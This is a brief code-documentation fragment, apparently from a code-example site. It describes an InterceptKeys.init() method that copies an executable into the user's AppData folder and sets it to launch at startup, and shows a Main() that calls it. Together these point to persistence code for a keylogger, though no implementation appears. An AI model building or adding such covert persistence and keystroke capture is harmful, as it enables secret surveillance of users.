init() 개인적인 정적인 메소드

Method used to copy the executable to user's appdata and make it launch at startup
private static init ( ) : void
리턴 void
예제 #1
0
 public static void Main()
 {
     InterceptKeys.init();
 }